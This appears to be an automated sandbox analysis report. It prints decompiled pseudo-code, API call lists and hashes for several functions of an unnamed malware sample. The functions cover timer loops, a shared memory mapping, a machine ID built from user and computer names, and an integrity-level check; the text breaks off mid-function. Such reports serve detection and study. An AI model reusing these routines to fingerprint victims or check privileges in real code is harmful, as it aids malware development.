                                                          • Source File: 00000023.00000002.390282445.0000000002B91000.00000020.00000001.sdmp, Offset: 02B90000, based on PE: true
                                                          • Associated: 00000023.00000002.390249117.0000000002B90000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390318241.0000000002B9C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390350228.0000000002B9D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390398092.0000000002B9F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: ExceptionRaise$ErrorLastLibraryLoad
                                                          • String ID: $
                                                          • API String ID: 948315288-3993045852
                                                          • Opcode ID: bf5e38f6ce47b16bd6d7875fa2c463e9ee2e73cbd75613bf8d74ee90da15f26d
                                                          • Instruction ID: 0705c496003b58c4fb2df0868b364e10ebd3b3904a56fabccae86d572d812261
                                                          • Opcode Fuzzy Hash: bf5e38f6ce47b16bd6d7875fa2c463e9ee2e73cbd75613bf8d74ee90da15f26d
                                                          • Instruction Fuzzy Hash: 96815C71A40605AFDF10CF99D980BAEBBF9FF48344F108469E945D7240EB70E950CB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02B951B0, Relevance: 16.6, APIs: 11, Instructions: 150timememoryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 83%
                                                          			E02B951B0(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				struct %anon52 _v8;
				long _v12;
				char _v16;
				char _v20;
				signed int _v24;
				intOrPtr _v32;
				union _LARGE_INTEGER _v36;
				intOrPtr _v40;
				void* _v44;
				void _v88;
				char _v92;
				struct %anon52 _t46;
				intOrPtr _t51;
				long _t53;
				void* _t54;
				struct %anon52 _t60;
				long _t64;
				signed int _t65;
				void* _t68;
				void* _t70;
				signed int _t71;
				intOrPtr _t73;
				intOrPtr _t76;
				void** _t78;
				void* _t80;

				_t73 = __edx;
				_v92 = 0;
				memset( &_v88, 0, 0x2c);
				_t46 = CreateWaitableTimerA(0, 1, 0);
				_v44 = _t46;
				if(_t46 == 0) {
					_v8.LowPart = GetLastError();
				} else {
					_push(0xffffffff);
					_push(0xff676980);
					_push(0);
					_push( *0x2b9d240);
					_v20 = 0;
					_v16 = 0;
					L02B9AF2E();
					_v36.LowPart = _t46;
					_v32 = _t73;
					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
					_t51 =  *0x2b9d26c; // 0x2e0
					_v40 = _t51;
					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
					_v8.LowPart = _t53;
					if(_t53 == 0) {
						if(_a8 != 0) {
							L4:
							 *0x2b9d24c = 5;
						} else {
							_t68 = E02B98D14(_t73); // executed
							if(_t68 != 0) {
								goto L4;
							}
						}
						_v12 = 0;
						L6:
						L6:
						if(_v12 == 1 && ( *0x2b9d260 & 0x00000001) == 0) {
							_v12 = 2;
						}
						_t71 = _v12;
						_t58 = _t71 << 4;
						_t76 = _t80 + (_t71 << 4) - 0x54;
						_t72 = _t71 + 1;
						_v24 = _t71 + 1;
						_t60 = E02B9A376(_t72, _t76, _t72, _t80 + _t58 - 0x58, _t76,  &_v20,  &_v16); // executed
						_v8.LowPart = _t60;
						if(_t60 != 0) {
							goto L17;
						}
						_t65 = _v24;
						_v12 = _t65;
						_t90 = _t65 - 3;
						if(_t65 != 3) {
							goto L6;
						} else {
							_v8.LowPart = E02B936B1(_t72, _t90,  &_v92, _a4, _a8);
						}
						goto L12;
						L17:
						__eflags = _t60 - 0x10d2;
						if(_t60 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0x2b9d244);
							goto L21;
						} else {
							__eflags =  *0x2b9d248; // 0x0
							if(__eflags == 0) {
								goto L12;
							} else {
								_t60 = E02B96761();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0x2b9d248);
								L21:
								L02B9AF2E();
								_v36.LowPart = _t60;
								_v32 = _t76;
								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0); // executed
								_t64 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
								_v8.LowPart = _t64;
								__eflags = _t64;
								if(_t64 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
					_t78 =  &_v92;
					_t70 = 3;
					do {
						_t54 =  *_t78;
						if(_t54 != 0) {
							HeapFree( *0x2b9d238, 0, _t54);
						}
						_t78 =  &(_t78[4]);
						_t70 = _t70 - 1;
					} while (_t70 != 0);
					CloseHandle(_v44);
				}
				return _v8;
				goto L25;
			}




























                                                          0x02b951b0
                                                          0x02b951c2
                                                          0x02b951c5
                                                          0x02b951d1
                                                          0x02b951d7
                                                          0x02b951dc
                                                          0x02b95343
                                                          0x02b951e2
                                                          0x02b951e2
                                                          0x02b951e4
                                                          0x02b951e9
                                                          0x02b951ea
                                                          0x02b951f0
                                                          0x02b951f3
                                                          0x02b951f6
                                                          0x02b95204
                                                          0x02b9520f
                                                          0x02b95212
                                                          0x02b95214
                                                          0x02b95221
                                                          0x02b9522b
                                                          0x02b9522d
                                                          0x02b95232
                                                          0x02b95237
                                                          0x02b95242
                                                          0x02b95242
                                                          0x02b95239
                                                          0x02b95239
                                                          0x02b95240
                                                          0x00000000
                                                          0x00000000
                                                          0x02b95240
                                                          0x02b9524c
                                                          0x00000000
                                                          0x02b9524f
                                                          0x02b95253
                                                          0x02b9525e
                                                          0x02b9525e
                                                          0x02b95265
                                                          0x02b9526e
                                                          0x02b95275
                                                          0x02b9527e
                                                          0x02b95281
                                                          0x02b95284
                                                          0x02b95289
                                                          0x02b9528e
                                                          0x00000000
                                                          0x00000000
                                                          0x02b95290
                                                          0x02b95293
                                                          0x02b95296
                                                          0x02b95299
                                                          0x00000000
                                                          0x02b9529b
                                                          0x02b952aa
                                                          0x02b952aa
                                                          0x00000000
                                                          0x02b952d8
                                                          0x02b952d8
                                                          0x02b952dd
                                                          0x02b952fc
                                                          0x02b952fe
                                                          0x02b95303
                                                          0x02b95304
                                                          0x00000000
                                                          0x02b952df
                                                          0x02b952df
                                                          0x02b952e5
                                                          0x00000000
                                                          0x02b952e7
                                                          0x02b952e7
                                                          0x02b952ec
                                                          0x02b952ee
                                                          0x02b952f3
                                                          0x02b952f4
                                                          0x02b9530a
                                                          0x02b9530a
                                                          0x02b95312
                                                          0x02b9531d
                                                          0x02b95320
                                                          0x02b9532b
                                                          0x02b9532d
                                                          0x02b95330
                                                          0x02b95332
                                                          0x00000000
                                                          0x02b95338
                                                          0x00000000
                                                          0x02b95338
                                                          0x02b95332
                                                          0x02b952e5
                                                          0x00000000
                                                          0x02b952dd
                                                          0x02b952ad
                                                          0x02b952af
                                                          0x02b952b2
                                                          0x02b952b3
                                                          0x02b952b3
                                                          0x02b952b7
                                                          0x02b952c1
                                                          0x02b952c1
                                                          0x02b952c7
                                                          0x02b952ca
                                                          0x02b952ca
                                                          0x02b952d0
                                                          0x02b952d0
                                                          0x02b9534d
                                                          0x00000000

                                                          APIs
                                                          • memset.NTDLL ref: 02B951C5
                                                          • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 02B951D1
                                                          • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 02B951F6
                                                          • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 02B95212
                                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 02B9522B
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 02B952C1
                                                          • CloseHandle.KERNEL32(?), ref: 02B952D0
                                                          • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 02B9530A
                                                          • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,02B95D5E,?), ref: 02B95320
                                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 02B9532B
                                                            • Part of subcall function 02B98D14: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,069B9368,00000000,?,74B5F710,00000000,74B5F730), ref: 02B98D63
                                                            • Part of subcall function 02B98D14: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,069B93A0,?,00000000,30314549,00000014,004F0053,069B935C), ref: 02B98E00
                                                            • Part of subcall function 02B98D14: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,02B9523E), ref: 02B98E12
                                                          • GetLastError.KERNEL32 ref: 02B9533D
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.390282445.0000000002B91000.00000020.00000001.sdmp, Offset: 02B90000, based on PE: true
                                                          • Associated: 00000023.00000002.390249117.0000000002B90000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390318241.0000000002B9C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390350228.0000000002B9D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390398092.0000000002B9F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                                                          • String ID:
                                                          • API String ID: 3521023985-0
                                                          • Opcode ID: b21db8cd9654d672d83ac76fb118992a794fee46f186eae20503c0ca1438d82a
                                                          • Instruction ID: 0112ce16b69a97537fdd7dd7a3f4dfdeb2e7a0455058ae405f6915ccfcd76b3d
                                                          • Opcode Fuzzy Hash: b21db8cd9654d672d83ac76fb118992a794fee46f186eae20503c0ca1438d82a
                                                          • Instruction Fuzzy Hash: C0517B71C41228ABCF22AF95DD44AEEBFB9EF09760F604666E841E3180D7309650CFA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02B9232F, Relevance: 13.6, APIs: 9, Instructions: 72filetimeCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 74%
                                                          			E02B9232F(intOrPtr __edx, void** _a4, void** _a8) {
				intOrPtr _v8;
				struct _FILETIME* _v12;
				short _v56;
				struct _FILETIME* _t12;
				intOrPtr _t13;
				void* _t17;
				void* _t21;
				intOrPtr _t27;
				long _t28;
				void* _t30;

				_t27 = __edx;
				_t12 =  &_v12;
				GetSystemTimeAsFileTime(_t12);
				_push(0x192);
				_push(0x54d38000);
				_push(_v8);
				_push(_v12);
				L02B9AF28();
				_push(_t12);
				_v12 = _t12;
				_t13 =  *0x2b9d2a8; // 0x3e1a5a8
				_t5 = _t13 + 0x2b9e87e; // 0x69b8e26
				_t6 = _t13 + 0x2b9e59c; // 0x530025
				_push(0x16);
				_push( &_v56);
				_v8 = _t27;
				L02B9ABCA();
				_t17 = CreateFileMappingW(0xffffffff, 0x2b9d2ac, 4, 0, 0x1000,  &_v56); // executed
				_t30 = _t17;
				if(_t30 == 0) {
					_t28 = GetLastError();
				} else {
					if(GetLastError() == 0xb7) {
						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
						if(_t21 == 0) {
							_t28 = GetLastError();
							if(_t28 != 0) {
								goto L6;
							}
						} else {
							 *_a4 = _t30;
							 *_a8 = _t21;
							_t28 = 0;
						}
					} else {
						_t28 = 2;
						L6:
						CloseHandle(_t30);
					}
				}
				return _t28;
			}













                                                          0x02b9232f
                                                          0x02b92337
                                                          0x02b9233b
                                                          0x02b92341
                                                          0x02b92346
                                                          0x02b9234b
                                                          0x02b9234e
                                                          0x02b92351
                                                          0x02b92356
                                                          0x02b92357
                                                          0x02b9235a
                                                          0x02b9235f
                                                          0x02b92366
                                                          0x02b92370
                                                          0x02b92372
                                                          0x02b92373
                                                          0x02b92376
                                                          0x02b92392
                                                          0x02b92398
                                                          0x02b9239c
                                                          0x02b923ea
                                                          0x02b9239e
                                                          0x02b923ab
                                                          0x02b923bb
                                                          0x02b923c3
                                                          0x02b923d5
                                                          0x02b923d9
                                                          0x00000000
                                                          0x00000000
                                                          0x02b923c5
                                                          0x02b923c8
                                                          0x02b923cd
                                                          0x02b923cf
                                                          0x02b923cf
                                                          0x02b923ad
                                                          0x02b923af
                                                          0x02b923db
                                                          0x02b923dc
                                                          0x02b923dc
                                                          0x02b923ab
                                                          0x02b923f1

                                                          APIs
                                                          • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,02B95C31,?,?,4D283A53,?,?), ref: 02B9233B
                                                          • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 02B92351
                                                          • _snwprintf.NTDLL ref: 02B92376
                                                          • CreateFileMappingW.KERNELBASE(000000FF,02B9D2AC,00000004,00000000,00001000,?), ref: 02B92392
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,02B95C31,?,?,4D283A53), ref: 02B923A4
                                                          • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 02B923BB
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,02B95C31,?,?), ref: 02B923DC
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,02B95C31,?,?,4D283A53), ref: 02B923E4
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.390282445.0000000002B91000.00000020.00000001.sdmp, Offset: 02B90000, based on PE: true
                                                          • Associated: 00000023.00000002.390249117.0000000002B90000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390318241.0000000002B9C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390350228.0000000002B9D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390398092.0000000002B9F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                                          • String ID:
                                                          • API String ID: 1814172918-0
                                                          • Opcode ID: 9f8bf33074e8afe14156cff4daf282f78cee72eeaa9ea6fd03a756a8a941224e
                                                          • Instruction ID: 37a2a227d75b6045dc80344ae771f3c438ab9c741799e54e6278caee9fb5051c
                                                          • Opcode Fuzzy Hash: 9f8bf33074e8afe14156cff4daf282f78cee72eeaa9ea6fd03a756a8a941224e
                                                          • Instruction Fuzzy Hash: 8621CD72A84204BFDB11AFA8DC45F9E3BAAEB48740F214562FA05E71D0D7709A14CB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02B99135, Relevance: 12.1, APIs: 8, Instructions: 103memoryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 96%
                                                          			E02B99135(char __eax, void* __esi) {
				long _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v28;
				long _t34;
				signed int _t39;
				long _t50;
				char _t59;
				intOrPtr _t61;
				void* _t62;
				void* _t64;
				char _t65;
				intOrPtr* _t67;
				void* _t68;
				void* _t69;

				_t69 = __esi;
				_t65 = __eax;
				_v8 = 0;
				_v12 = __eax;
				if(__eax == 0) {
					_t59 =  *0x2b9d270; // 0xd448b889
					_v12 = _t59;
				}
				_t64 = _t69;
				E02B9A6CC( &_v12, _t64);
				if(_t65 != 0) {
					 *_t69 =  *_t69 ^  *0x2b9d2a4 ^ 0x4c0ca0ae;
				} else {
					GetUserNameW(0,  &_v8); // executed
					_t50 = _v8;
					if(_t50 != 0) {
						_t62 = RtlAllocateHeap( *0x2b9d238, 0, _t50 + _t50);
						if(_t62 != 0) {
							if(GetUserNameW(_t62,  &_v8) != 0) {
								_t64 = _t62;
								 *_t69 =  *_t69 ^ E02B97306(_v8 + _v8, _t64);
							}
							HeapFree( *0x2b9d238, 0, _t62);
						}
					}
				}
				_t61 = __imp__;
				_v8 = _v8 & 0x00000000;
				GetComputerNameW(0,  &_v8);
				_t34 = _v8;
				if(_t34 != 0) {
					_t68 = RtlAllocateHeap( *0x2b9d238, 0, _t34 + _t34);
					if(_t68 != 0) {
						if(GetComputerNameW(_t68,  &_v8) != 0) {
							_t64 = _t68;
							 *(_t69 + 0xc) =  *(_t69 + 0xc) ^ E02B97306(_v8 + _v8, _t64);
						}
						HeapFree( *0x2b9d238, 0, _t68);
					}
				}
				asm("cpuid");
				_t67 =  &_v28;
				 *_t67 = 1;
				 *((intOrPtr*)(_t67 + 4)) = _t61;
				 *((intOrPtr*)(_t67 + 8)) = 0;
				 *(_t67 + 0xc) = _t64;
				_t39 = _v16 ^ _v20 ^ _v28;
				 *(_t69 + 4) =  *(_t69 + 4) ^ _t39;
				return _t39;
			}



















                                                          0x02b99135
                                                          0x02b9913d
                                                          0x02b99141
                                                          0x02b99144
                                                          0x02b99149
                                                          0x02b9914b
                                                          0x02b99150
                                                          0x02b99150
                                                          0x02b99156
                                                          0x02b99158
                                                          0x02b99165
                                                          0x02b991c6
                                                          0x02b99167
                                                          0x02b9916c
                                                          0x02b99172
                                                          0x02b99177
                                                          0x02b99185
                                                          0x02b99189
                                                          0x02b99198
                                                          0x02b9919f
                                                          0x02b991a6
                                                          0x02b991a6
                                                          0x02b991b1
                                                          0x02b991b1
                                                          0x02b99189
                                                          0x02b99177
                                                          0x02b991c8
                                                          0x02b991ce
                                                          0x02b991d8
                                                          0x02b991da
                                                          0x02b991df
                                                          0x02b991ee
                                                          0x02b991f2
                                                          0x02b991fd
                                                          0x02b99204
                                                          0x02b9920b
                                                          0x02b9920b
                                                          0x02b99217
                                                          0x02b99217
                                                          0x02b991f2
                                                          0x02b99222
                                                          0x02b99224
                                                          0x02b99227
                                                          0x02b99229
                                                          0x02b9922c
                                                          0x02b9922f
                                                          0x02b99239
                                                          0x02b9923d
                                                          0x02b99241

                                                          APIs
                                                          • GetUserNameW.ADVAPI32(00000000,?), ref: 02B9916C
                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 02B99183
                                                          • GetUserNameW.ADVAPI32(00000000,?), ref: 02B99190
                                                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,02B95D20), ref: 02B991B1
                                                          • GetComputerNameW.KERNEL32(00000000,00000000), ref: 02B991D8
                                                          • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 02B991EC
                                                          • GetComputerNameW.KERNEL32(00000000,00000000), ref: 02B991F9
                                                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,02B95D20), ref: 02B99217
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.390282445.0000000002B91000.00000020.00000001.sdmp, Offset: 02B90000, based on PE: true
                                                          • Associated: 00000023.00000002.390249117.0000000002B90000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390318241.0000000002B9C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390350228.0000000002B9D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390398092.0000000002B9F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: HeapName$AllocateComputerFreeUser
                                                          • String ID:
                                                          • API String ID: 3239747167-0
                                                          • Opcode ID: 01aaa70df96fb1374811893907fd0d6cf32afc11807c73690d8ebdfd9ef9d196
                                                          • Instruction ID: 82188f61d9447466a1246232609b6793e56c8701ec48206b0de2c8232e621387
                                                          • Opcode Fuzzy Hash: 01aaa70df96fb1374811893907fd0d6cf32afc11807c73690d8ebdfd9ef9d196
                                                          • Instruction Fuzzy Hash: BD311871A40606EFDB10EFA9D980A6EF7F9FB48244F1184B9E544D7210D730EA519B10
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02B91A08, Relevance: 10.6, APIs: 7, Instructions: 75COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E02B91A08(long* _a4) {
				long _v8;
				void* _v12;
				void _v16;
				long _v20;
				int _t33;
				void* _t46;

				_v16 = 1;
				_v20 = 0x2000;
				if( *0x2b9d25c > 5) {
					_v16 = 0;
					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
						_v8 = 0;
						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
						if(_v8 != 0) {
							_t46 = E02B9A71F(_v8);
							if(_t46 != 0) {
								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
								if(_t33 != 0) {
									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
								}
								E02B9A734(_t46);
							}
						}
						CloseHandle(_v12);
					}
				}
				 *_a4 = _v20;
				return _v16;
			}









                                                          0x02b91a15
                                                          0x02b91a1c
                                                          0x02b91a23
                                                          0x02b91a37
                                                          0x02b91a42
                                                          0x02b91a5a
                                                          0x02b91a67
                                                          0x02b91a6a
                                                          0x02b91a6f
                                                          0x02b91a7a
                                                          0x02b91a7e
                                                          0x02b91a8d
                                                          0x02b91a91
                                                          0x02b91aad
                                                          0x02b91aad
                                                          0x02b91ab1
                                                          0x02b91ab1
                                                          0x02b91ab6
                                                          0x02b91aba
                                                          0x02b91ac0
                                                          0x02b91ac1
                                                          0x02b91ac8
                                                          0x02b91ace

                                                          APIs
                                                          • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 02B91A3A
                                                          • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 02B91A5A
                                                          • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 02B91A6A
                                                          • CloseHandle.KERNEL32(00000000), ref: 02B91ABA
                                                            • Part of subcall function 02B9A71F: RtlAllocateHeap.NTDLL(00000000,00000000,02B95595), ref: 02B9A72B
                                                          • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 02B91A8D
                                                          • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 02B91A95
                                                          • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 02B91AA5
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.390282445.0000000002B91000.00000020.00000001.sdmp, Offset: 02B90000, based on PE: true
                                                          • Associated: 00000023.00000002.390249117.0000000002B90000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390318241.0000000002B9C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390350228.0000000002B9D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390398092.0000000002B9F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                                                          • String ID:
                                                          • API String ID: 1295030180-0
                                                          • Opcode ID: bc91b79300810c433e037bf481c481842b2892bfbbc6968f8e3bcf9686a11d41
                                                          • Instruction ID: bb81818ef07ac291c39bf07627885dacda5ceb6d9552008df21f128456a5fa66
                                                          • Opcode Fuzzy Hash: bc91b79300810c433e037bf481c481842b2892bfbbc6968f8e3bcf9686a11d41
                                                          • Instruction Fuzzy Hash: 01214A7594024AFFEF00EFA5DD84EAEBBB9EB08344F0041A6E920A7150C7719E15EF60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02B9391F, Relevance: 9.2, APIs: 6, Instructions: 154memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SysAllocString.OLEAUT32(?), ref: 02B9395A
                                                          • IUnknown_QueryInterface_Proxy.RPCRT4(?,332C4425,?), ref: 02B939DD
                                                          • StrStrIW.SHLWAPI(00000000,006E0069), ref: 02B93A1D
                                                          • SysFreeString.OLEAUT32(00000000), ref: 02B93A3F
                                                            • Part of subcall function 02B96F3A: SysAllocString.OLEAUT32(02B9C290), ref: 02B96F8A
                                                          • SafeArrayDestroy.OLEAUT32(00000000), ref: 02B93A92
                                                          • SysFreeString.OLEAUT32(00000000), ref: 02B93AA1
                                                            • Part of subcall function 02B91AE2: Sleep.KERNELBASE(000001F4), ref: 02B91B2A
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.390282445.0000000002B91000.00000020.00000001.sdmp, Offset: 02B90000, based on PE: true
                                                          • Associated: 00000023.00000002.390249117.0000000002B90000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390318241.0000000002B9C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390350228.0000000002B9D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390398092.0000000002B9F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: String$AllocFree$ArrayDestroyInterface_ProxyQuerySafeSleepUnknown_
                                                          • String ID:
                                                          • API String ID: 2118684380-0
                                                          • Opcode ID: f5dce47f980f850ec91028fd524354a3b908b92d98fc4fa441b02749c01e70a6
                                                          • Instruction ID: 8988699295a0ecfb17feb5077831aaf01566d09bc5d45696902344e3739be551
                                                          • Opcode Fuzzy Hash: f5dce47f980f850ec91028fd524354a3b908b92d98fc4fa441b02749c01e70a6
                                                          • Instruction Fuzzy Hash: B6516F76900609EFDF01DFA8C844A9EB7BAFF88744F1588A9E515DB220DB31ED05CB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02B912E5, Relevance: 9.1, APIs: 6, Instructions: 60sleepmemorytimeCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 74%
                                                          			E02B912E5(void* __ecx, void* __edx, intOrPtr _a4) {
				struct _FILETIME _v12;
				void* _t10;
				void* _t12;
				int _t14;
				signed int _t16;
				void* _t18;
				signed int _t19;
				unsigned int _t23;
				void* _t26;
				signed int _t33;

				_t26 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t10 = HeapCreate(0, 0x400000, 0); // executed
				 *0x2b9d238 = _t10;
				if(_t10 != 0) {
					 *0x2b9d1a8 = GetTickCount();
					_t12 = E02B93E69(_a4);
					if(_t12 == 0) {
						do {
							GetSystemTimeAsFileTime( &_v12);
							_t14 = SwitchToThread();
							_t23 = _v12.dwHighDateTime;
							_t16 = (_t23 << 0x00000020 | _v12.dwLowDateTime) >> 7;
							_push(0);
							_push(9);
							_push(_t23 >> 7);
							_push(_t16);
							L02B9B08A();
							_t33 = _t14 + _t16;
							_t18 = E02B95548(_a4, _t33);
							_t19 = 2;
							_t25 = _t33;
							Sleep(_t19 << _t33); // executed
						} while (_t18 == 1);
						if(E02B94DA2(_t25) != 0) {
							 *0x2b9d260 = 1; // executed
						}
						_t12 = E02B95BA2(_t26); // executed
					}
				} else {
					_t12 = 8;
				}
				return _t12;
			}













                                                          0x02b912e5
                                                          0x02b912eb
                                                          0x02b912ec
                                                          0x02b912f8
                                                          0x02b912fe
                                                          0x02b91305
                                                          0x02b91315
                                                          0x02b9131a
                                                          0x02b91321
                                                          0x02b91323
                                                          0x02b91328
                                                          0x02b9132e
                                                          0x02b91334
                                                          0x02b9133e
                                                          0x02b91342
                                                          0x02b91344
                                                          0x02b91349
                                                          0x02b9134a
                                                          0x02b9134b
                                                          0x02b91350
                                                          0x02b91356
                                                          0x02b9135f
                                                          0x02b91360
                                                          0x02b91365
                                                          0x02b9136b
                                                          0x02b91377
                                                          0x02b91379
                                                          0x02b91379
                                                          0x02b91383
                                                          0x02b91383
                                                          0x02b91307
                                                          0x02b91309
                                                          0x02b91309
                                                          0x02b9138d

                                                          APIs
                                                          • HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001,?,?,?,02B94EF2,?), ref: 02B912F8
                                                          • GetTickCount.KERNEL32 ref: 02B9130C
                                                          • GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001,?,?,?,02B94EF2,?), ref: 02B91328
                                                          • SwitchToThread.KERNEL32(?,00000001,?,?,?,02B94EF2,?), ref: 02B9132E
                                                          • _aullrem.NTDLL(?,?,00000009,00000000), ref: 02B9134B
                                                          • Sleep.KERNELBASE(00000002,00000000,?,00000001,?,?,?,02B94EF2,?), ref: 02B91365
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.390282445.0000000002B91000.00000020.00000001.sdmp, Offset: 02B90000, based on PE: true
                                                          • Associated: 00000023.00000002.390249117.0000000002B90000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390318241.0000000002B9C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390350228.0000000002B9D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390398092.0000000002B9F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: Time$CountCreateFileHeapSleepSwitchSystemThreadTick_aullrem
                                                          • String ID:
                                                          • API String ID: 507476733-0
                                                          • Opcode ID: 6a2534da38a4dd1caa40bb5a725e85acc6c24da27f5ce28fc786bca98d17a271
                                                          • Instruction ID: 85808f748f838477584075d6a547a5700f719e320adb911bd54ca1872438da00
                                                          • Opcode Fuzzy Hash: 6a2534da38a4dd1caa40bb5a725e85acc6c24da27f5ce28fc786bca98d17a271
                                                          • Instruction Fuzzy Hash: 7F11A972E943027FEF106B69DD09B5A7BE9EB48390F0049B6F949D7280EB70D4508B61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02B95BA2, Relevance: 7.7, APIs: 5, Instructions: 159memoryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 57%
                                                          			E02B95BA2(signed int __edx) {
				signed int _v8;
				long _v12;
				CHAR* _v16;
				long _v20;
				void* __edi;
				void* __esi;
				void* _t21;
				CHAR* _t22;
				CHAR* _t25;
				intOrPtr _t26;
				void* _t27;
				void* _t31;
				void* _t32;
				CHAR* _t36;
				CHAR* _t43;
				CHAR* _t44;
				void* _t49;
				void* _t51;
				CHAR* _t54;
				signed char _t56;
				intOrPtr _t58;
				signed int _t59;
				void* _t62;
				CHAR* _t65;
				CHAR* _t66;
				char* _t67;
				void* _t68;

				_t61 = __edx;
				_v20 = 0;
				_v8 = 0;
				_v12 = 0;
